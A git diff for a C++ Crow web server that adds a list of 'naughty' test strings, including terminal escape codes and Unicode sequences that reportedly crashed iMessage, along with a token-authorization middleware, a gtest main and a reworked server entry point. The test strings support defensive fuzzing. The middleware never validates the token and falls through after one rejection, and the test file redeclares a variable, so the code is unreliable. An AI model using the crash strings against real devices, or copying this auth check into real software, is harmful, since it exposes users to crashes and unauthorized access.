+RomansInSussex.co.uk +http://www.cum.qc.ca/ +Craig Cockburn, Software Specialist +Linda Callahan +Dr. Herman I. Libshitz +magna cum laude +Super Bowl XXX +medieval erection of parapets +evaluate +mocha +expression +Arsenal canal +classic +Tyson Gay +Dick Van Dyke +basement + +# Human injection +# +# Strings which may cause human to reinterpret worldview + +If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you. + +# Terminal escape codes +# +# Strings which punish the fools who use cat/type on this file + +Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue +But now...[20Cfor my greatest trick...[8m +The quick brown fox... [Beeeep] + +# iOS Vulnerabilities +# +# Strings which crashed iMessage in various versions of iOS + +Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 +🏳0🌈️
\ No newline at end of file diff --git a/src/gtest_main.cpp b/src/gtest_main.cpp new file mode 100644 index 0000000000..1659be89ee --- /dev/null +++ b/src/gtest_main.cpp @@ -0,0 +1,6 @@ +#include "gtest/gtest.h" + +int main(int argc, char **argv) { + ::testing::InitGoogleTest(&argc, argv); + return RUN_ALL_TESTS(); +}
\ No newline at end of file diff --git a/src/token_authorization_middleware.cpp b/src/token_authorization_middleware.cpp new file mode 100644 index 0000000000..61ac28debd --- /dev/null +++ b/src/token_authorization_middleware.cpp @@ -0,0 +1,49 @@ +#include <unordered_map> + +#include <boost/algorithm/string/predicate.hpp> + +#include <token_authorization_middleware.hpp> + +namespace crow +{ + std::string TokenAuthorizationMiddleware::context::get_cookie(const std::string& key) + { + if (cookie_sessions.count(key)) + return cookie_sessions[key]; + return {}; + } + + void TokenAuthorizationMiddleware::context::set_cookie(const std::string& key, const std::string& value) + { + cookies_to_push_to_client.emplace(key, value); + } + + + void TokenAuthorizationMiddleware::before_handle(crow::request& req, response& res, context& ctx) + { + if (req.url == "/login"){ + return; + } + + // Check for an authorization header, reject if not present + if (req.headers.count("Authorization") != 1) { + res.code = 400; + res.end(); + return; + } + std::string auth_header = req.get_header_value("Authorization"); + // If the user is attempting any kind of auth other than token, reject + if (!boost::starts_with(auth_header, "Token ")) { + res.code = 400; + res.end(); + } + } + + void TokenAuthorizationMiddleware::after_handle(request& /*req*/, response& res, context& ctx) + { + for (auto& cookie : ctx.cookies_to_push_to_client) { + res.add_header("Set-Cookie", cookie.first + "=" + cookie.second); + } + } + +}
\ No newline at end of file diff --git a/src/token_authorization_middleware_test.cpp b/src/token_authorization_middleware_test.cpp new file mode 100644 index 0000000000..8d5be1ebbd --- /dev/null +++ b/src/token_authorization_middleware_test.cpp @@ -0,0 +1,26 @@ +#include "token_authorization_middleware.hpp" +#include <crow/app.h> +#include "gtest/gtest.h" + + +// Tests that Base64 basic strings work +TEST(Authentication, TestBasicReject) +{ + crow::App<crow::TokenAuthorizationMiddleware> app; + crow::request req; + crow::response res; + app.handle(req, res); + ASSERT_EQ(res.code, 400); + + + crow::App<crow::TokenAuthorizationMiddleware> app; + decltype(app)::server_t server(&app, "127.0.0.1", 45451); + CROW_ROUTE(app, "/")([&](const crow::request& req) + { + app.get_context<NullMiddleware>(req); + app.get_context<NullSimpleMiddleware>(req); + return ""; + }); +} + + diff --git a/src/example.cpp b/src/webserver_main.cpp index 91fdb7f8aa..bbe599e847 100644 --- a/src/example.cpp +++ b/src/webserver_main.cpp @@ -1,106 +1,71 @@ -#include "crow/query_string.h" -#include "crow/http_parser_merged.h" #include "crow/ci_map.h" +#include "crow/http_parser_merged.h" +#include "crow/query_string.h" //#include "crow/TinySHA1.hpp" -#include "crow/settings.h" -#include "crow/socket_adaptors.h" -#include "crow/json.h" -#include "crow/mustache.h" -#include "crow/logging.h" -#include "crow/dumb_timer_queue.h" -#include "crow/utility.h" +#include "crow/app.h" #include "crow/common.h" +#include "crow/dumb_timer_queue.h" +#include "crow/http_connection.h" #include "crow/http_request.h" -#include "crow/websocket.h" -#include "crow/parser.h" #include "crow/http_response.h" +#include "crow/http_server.h" +#include "crow/json.h" +#include "crow/logging.h" #include "crow/middleware.h" -#include "crow/routing.h" #include "crow/middleware_context.h" -#include "crow/http_connection.h" -#include "crow/http_server.h" -#include "crow/app.h" +#include "crow/mustache.h" +#include "crow/parser.h" +#include "crow/routing.h" +#include "crow/settings.h" +#include "crow/socket_adaptors.h" +#include "crow/utility.h" +#include "crow/websocket.h" #include "color_cout_g3_sink.hpp" -#include "ssl_key_handler.hpp" +#include "token_authorization_middleware.hpp" + #include <iostream> #include <string> - - - -struct ExampleMiddleware -{ - std::string message; - - ExampleMiddleware() - { - message = "foo"; - } - - void setMessage(std::string newMsg) - { - message = newMsg; - } - - struct context - { - }; - - void before_handle(crow::request& /*req*/, crow::response& /*res*/, context& /*ctx*/) - { - CROW_LOG_DEBUG << " - MESSAGE: " << message; - } - - void after_handle(crow::request& /*req*/, crow::response& /*res*/, context& /*ctx*/) - { - // no-op - } -}; - - +#include "ssl_key_handler.hpp" int main(int argc, char** argv) { - auto worker = g3::LogWorker::createLogWorker(); - auto handle= worker->addDefaultLogger(argv[0], "/tmp/"); - g3::initializeLogging(worker.get()); - auto log_file_name = handle->call(&g3::FileSink::fileName); - auto sink_handle = worker->addSink(std::make_unique<crow::ColorCoutSink>(), - &crow::ColorCoutSink::ReceiveLogMessage); + auto worker = g3::LogWorker::createLogWorker(); + auto handle = worker->addDefaultLogger(argv[0], "/tmp/"); + g3::initializeLogging(worker.get()); + auto log_file_name = handle->call(&g3::FileSink::fileName); + auto sink_handle = worker->addSink(std::make_unique<crow::ColorCoutSink>(), + &crow::ColorCoutSink::ReceiveLogMessage); - LOG(DEBUG) << "Logging to " << log_file_name.get() << "\n"; + LOG(DEBUG) << "Logging to " << log_file_name.get() << "\n"; std::string ssl_pem_file("server.pem"); ensuressl::ensure_openssl_key_present_and_valid(ssl_pem_file); //auto handler2 = std::make_shared<ExampleLogHandler>(); //crow::logger::setHandler(handler2.get()); - crow::App<ExampleMiddleware> app; - - app.get_middleware<ExampleMiddleware>().setMessage("hello"); + crow::App<crow::TokenAuthorizationMiddleware> app; CROW_ROUTE(app, "/") - .name("hello") - ([]{ - return "Hello World!"; - }); + .name("hello")([] { + return "Hello World!"; + }); CROW_ROUTE(app, "/about") - ([](){ + ([]() { return "About Crow example."; }); // a request to /path should be forwarded to /path/ CROW_ROUTE(app, "/path/") - ([](){ + ([]() { return "Trailing slash test case.."; }); - // simple json response // To see it in action enter {ip}:18080/json CROW_ROUTE(app, "/json") - ([]{ + ([] { crow::json::wvalue x; x["message"] = "Hello, World!"; return x; @@ -108,8 +73,8 @@ int main(int argc, char** argv) // To see it in action enter {ip}:18080/hello/{integer_between -2^32 and 100} and you should receive // {integer_between -2^31 and 100} bottles of beer! - CROW_ROUTE(app,"/hello/<int>") - ([](int count){ + CROW_ROUTE(app, "/hello/<int>") + ([](int count) { if (count > 100) return crow::response(400); std::ostringstream os; @@ -118,10 +83,10 @@ int main(int argc, char** argv) }); // To see it in action submit {ip}:18080/add/1/2 and you should receive 3 (exciting, isn't it) - CROW_ROUTE(app,"/add/<int>/<int>") - ([](const crow::request& /*req*/, crow::response& res, int a, int b){ + CROW_ROUTE(app, "/add/<int>/<int>") + ([](const crow::request& /*req*/, crow::response& res, int a, int b) { std::ostringstream os; - os << a+b; + os << a + b; res.write(os.str()); res.end(); }); @@ -129,7 +94,7 @@ int main(int argc, char** argv) // Compile error with message "Handler type is mismatched with URL paramters" //CROW_ROUTE(app,"/another/<int>") //([](int a, int b){ - //return crow::response(500); + //return crow::response(500); //}); // more json example @@ -144,49 +109,48 @@ int main(int argc, char** argv) // A simpler way for json example: // * curl -d '{"a":1,"b":2}' {ip}:18080/add_json CROW_ROUTE(app, "/add_json") - .methods("POST"_method) - ([](const crow::request& req){ - auto x = crow::json::load(req.body); - if (!x) - return crow::response(400); - int sum = x["a"].i()+x["b"].i(); - std::ostringstream os; - os << sum; - return crow::response{os.str()}; - }); + .methods("POST"_method)([](const crow::request& req) { + auto x = crow::json::load(req.body); + if (!x) + return crow::response(400); + int sum = x["a"].i() + x["b"].i(); + std::ostringstream os; + os << sum; + return crow::response{os.str()}; + }); // Example of a request taking URL parameters // If you want to activate all the functions just query // {ip}:18080/params?foo='blabla'&pew=32&count[]=a&count[]=b CROW_ROUTE(app, "/params") - ([](const crow::request& req){ + ([](const crow::request& req) { std::ostringstream os; // To get a simple string from the url params // To see it in action /params?foo='blabla' - os << "Params: " << req.url_params << "\n\n"; + os << "Params: " << req.url_params << "\n\n"; os << "The key 'foo' was " << (req.url_params.get("foo") == nullptr ? "not " : "") << "found.\n"; // To get a double from the request // To see in action submit something like '/params?pew=42' - if(req.url_params.get("pew") != nullptr) { + if (req.url_params.get("pew") != nullptr) { double countD = boost::lexical_cast<double>(req.url_params.get("pew")); - os << "The value of 'pew' is " << countD << '\n'; + os << "The value of 'pew' is " << countD << '\n'; } // To get a list from the request // You have to submit something like '/params?count[]=a&count[]=b' to have a list with two values (a and b) auto count = req.url_params.get_list("count"); os << "The key 'count' contains " << count.size() << " value(s).\n"; - for(const auto& countVal : count) { + for (const auto& countVal : count) { os << " - " << countVal << '\n'; } return crow::response{os.str()}; - }); + }); CROW_ROUTE(app, "/large") - ([]{ - return std::string(512*1024, ' '); + ([] { + return std::string(512 * 1024, ' '); }); // ignore all log |